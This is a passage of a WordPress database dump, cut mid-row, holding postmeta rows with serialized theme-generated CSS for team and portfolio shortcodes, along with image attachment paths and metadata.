font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(13063,2736,'the7_shortcodes_dynamic_css','a:2:{s:32:\"632ba3c505e6d5c830c8c6d225ec76c1\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .team-desc {\n  padding: 25px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-632ba3c505e6d5c830c8c6d225ec76c1.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(13064,2750,'_wp_attachment_backup_sizes','a:8:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:200;s:6:\"height\";i:300;s:4:\"file\";s:8:\"w113.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:16:\"w113-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4770;}s:18:\"full-1665682821102\";a:3:{s:5:\"width\";i:150;s:6:\"height\";i:225;s:4:\"file\";s:23:\"w113-e1665682381836.jpg\";}s:23:\"thumbnail-1665682821102\";a:5:{s:4:\"file\";s:31:\"w113-e1665682381836-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4776;}s:18:\"full-1665682831231\";a:3:{s:5:\"width\";i:150;s:6:\"height\";i:225;s:4:\"file\";s:23:\"w113-e1665682821102.jpg\";}s:23:\"thumbnail-1665682831231\";a:5:{s:4:\"file\";s:31:\"w113-e1665682821102-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4829;}s:18:\"full-1665683744184\";a:3:{s:5:\"width\";i:150;s:6:\"height\";i:225;s:4:\"file\";s:23:\"w113-e1665682831231.jpg\";}s:23:\"thumbnail-1665683744184\";a:5:{s:4:\"file\";s:31:\"w113-e1665682831231-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4821;}}'),
(13066,2763,'_wp_attached_file','2022/10/w114-1-e1668034549228.jpg'),
(13067,2763,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:161;s:6:\"height\";i:201;s:4:\"file\";s:33:\"2022/10/w114-1-e1668034549228.jpg\";s:8:\"filesize\";i:48107;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"w114-1-e1668034549228-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4965;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13068,2764,'_wp_attached_file','2022/10/w113-1-e1668034908309.jpg'),
(13069,2764,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:120;s:6:\"height\";i:180;s:4:\"file\";s:33:\"2022/10/w113-1-e1668034908309.jpg\";s:8:\"filesize\";i:47123;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"w113-1-e1668034908309-120x150.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3893;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13070,2765,'_wp_attached_file','2022/10/w112-1-e1668034975644.jpg'),
(13071,2765,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:107;s:6:\"height\";i:160;s:4:\"file\";s:33:\"2022/10/w112-1-e1668034975644.jpg\";s:8:\"filesize\";i:65600;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"w112-1-e1668034975644-107x150.jpg\";s:5:\"width\";i:107;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3604;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13072,2766,'_wp_attached_file','2022/10/w111-1-e1668034737791.jpg'),
(13073,2766,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:120;s:6:\"height\";i:180;s:4:\"file\";s:33:\"2022/10/w111-1-e1668034737791.jpg\";s:8:\"filesize\";i:75921;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:33:\"w111-1-e1668034737791-120x150.jpg\";s:5:\"width\";i:120;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4971;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(13074,2082,'_wp_old_date','2022-10-09'),
(13075,2083,'_wp_old_date','2022-10-09'),
